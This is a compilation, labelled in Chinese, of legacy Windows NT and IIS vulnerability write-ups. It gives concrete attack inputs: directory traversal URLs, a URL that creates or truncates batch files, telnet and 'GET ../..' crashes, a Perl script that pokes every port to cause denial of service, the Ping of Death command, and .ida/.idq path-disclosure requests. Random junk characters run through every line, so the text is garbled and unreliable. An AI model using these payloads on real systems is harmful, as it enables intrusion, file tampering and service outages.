受影响系统:4.0,iis 1.0: b A1 @/ U8 D b% m5 e3 ]6 T3 K
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.$ h, Q* k9 P6 v% I3 u2 N9 \3 r
% D2 Q V; ^1 r$ v6 U/ \A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
) Y* C T9 @/ P8 c3 |9 K( N9 D- A: D7 f' H9 v- }
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
# _* L u! j, S8 N3 L! O( B. a1 B, \. w1 O! g0 o* k0 ~# @2 y
--------------------------------------------------------------------& P% X6 H/ X" v. J0 r: K
4 b" v* c( ~5 L$ v- e) a/ |3 g* m. X
受影响系统:4.0# X; e( ` i" W( L
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
' f2 o5 ~/ B! i0 s4 @7 B$ T8 V6 ]8 l
If the file 'target.bat' exists, the file will be truncated.
7 D1 i: v9 Z" h1 T% d" Q7 E' P+ e+ a. g9 }
3 t, j2 L, e( I0 M+ B! p( h" ~A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.7 P1 V' P1 x0 `1 Z5 \% Y W% N
1 w D. D, e6 t
----------------------------------------------------------------------
- h$ N2 ^+ L. |! ]! c; @; a
6 M* K8 {( ?* |6 m/ H. y6 k0 p受影响系统:3.51,4.0
+ x. a) \% |* m. f) A+ ~. DMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.6 n% C8 P% ^$ r0 k+ {3 U1 M% C
" J: t: x, k5 K: N- m3 R* N( VThe following steps;: U( _/ `/ x8 ~
2 l/ J8 y$ r8 W# a8 N4 zTelnet to an NT 4.0 system on port 135
' N! v) j1 I( t3 C1 j+ \5 SType about 10 characters followed by a <CR> 0 Q, g, L' A o6 c
Exit Telnet
; T2 [" }1 j! e* e! \$ {results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.' S* w& o6 Q+ x/ C Q9 T
$ `7 ?+ K3 T* f- V9 N; `* c4 G( d! m
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.8 a) ]; p) W5 X! f$ h
3 S4 Q4 R# G, Y: i5 S! O
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.6 ]# |: a J; Y
# C. ]5 U! Z/ p! cIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.( Z* }+ d3 F! q6 |1 x! m/ E
# A3 o% ?* p7 }0 h" ], G/ x
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):% C8 }" I6 d& Y0 G/ @- r* ^
7 [- A2 n, n& m* A6 i; [: R5 P; q& }) w
/*begin poke code*/
" W( D1 O# q" ?, t; a
4 `5 B/ M2 m: S% U" h' V: {use Socket;
9 ]. w6 Q9 v" e" buse FileHandle;
3 }+ o$ ?. o) l# E, trequire "chat2.pl";) R* \ l+ {9 ^: w% Y+ o0 y
9 W, A& d) c9 B& z) ~6 P; I' Q
$systemname = $ARGV[0] && shift;
" x8 Q Y: r! C% Z) b) Y. _& x' H8 l6 d/ W
$verbose = 1; # tell me what you're hitting
- e; o- J% G% b* b: F |) p$knownports = 1; # don't hit known problem ports
! V2 h0 x0 l. ^8 qfor ($port = $0; $port<65535; $port++) , Q: n- D+ i. s6 ~: ^
{
8 Q( T: V1 S& P8 C3 F( b( [/ a& j' I& A9 t8 |
! u: q/ y# a" u" X- q) `: m
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
_* B( Z: G" ^6 y/ F; \* lnext;, N( N9 t1 K- P$ z
}- l; }: N2 P& [
$fh = chat::open_port($systemname, $port);
( _3 R8 V3 a1 ]* ^4 { Z+ T, a% wchat::print ($fh,"This is about ten characters or more");
3 x# @& N U2 [+ bif ($verbose) {
( ]3 o: f% b) z5 z. J' J6 aprint "Trying port: $port\n";" p7 t+ _( ^/ e
}
* i( Z& w& K E5 d- ?chat::close($fh);
7 H+ n; v% M8 ^2 F* s
8 K$ a6 J9 n+ _+ S" @# w) e$ g9 b}
, i- W8 n, R" u
! {! U5 X; p' [3 G
( O5 x: `( \# i/ s, g$ @/ W5 p/*end poke code*/
- d* \8 k; H' X. m: V. I x4 d. s1 g i( ]. Y% S
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
; u0 |+ Y, R9 Y5 c" T. u$ _( g/ c$ j4 x
--------------------------------------------------------------------------------! [ q& ?5 H* E6 `$ h- m
3 \, T# f1 z. G$ ^受影响系统:4.0
2 s& T, b K+ s1 R" }; e+ G( u' n2 BUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.0 T; g: F2 } @0 W3 z5 f
7 j# W9 n3 H1 ?
This attack causes Dr. Watson to display an alert window and to log an error: 4 ~- B2 e/ f' G! P
5 I/ {; z% C3 a- M, x+ k
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"0 T- C# K" d% H8 F7 R& J4 U! v) S$ y4 j
6 C4 X7 V) m% @/ [/ D/ @1 l3 q--------------------------------------------------------------------------------
( O3 }; l! H q# E" x( N# m+ j
( N6 p) \; y: @+ ~$ l受影响系统:3.51,4.0
* P7 [2 a8 f* w a; fLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:+ K- O3 c4 o' C' B" s
4 c( ]; m% f2 \( f4 }5 ^STOP: 0X0000001E
5 U& g9 X+ ~: C8 G; {KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS1 f9 Y: G' X7 h. D2 u" d8 Z
2 x2 w: a. _% E) p-OR-* S! U3 S2 Z3 t w
- {; l5 p7 b' \0 Y2 Q
STOP: 0x0000000A
& J8 j2 O. t9 M+ [2 hIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
; D/ Y9 o& m6 a Q4 t; Y
' F3 Y5 ~6 @2 Q: _# P7 M. c" wNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
: g6 W" O* c s# I( L4 Y: p8 @0 |6 a& k# C1 B3 D
--------------------------------------------------------------------------------9 `; |2 Y! U# r- O% P1 T
0 @# T8 A8 O9 ~5 N0 mMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
- _6 J6 l# h4 R, z
- N1 k4 m" k3 Z--------------------------------------------------------5 p0 Q0 N# n- P7 M
8 R2 u/ {& X( @1 bIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |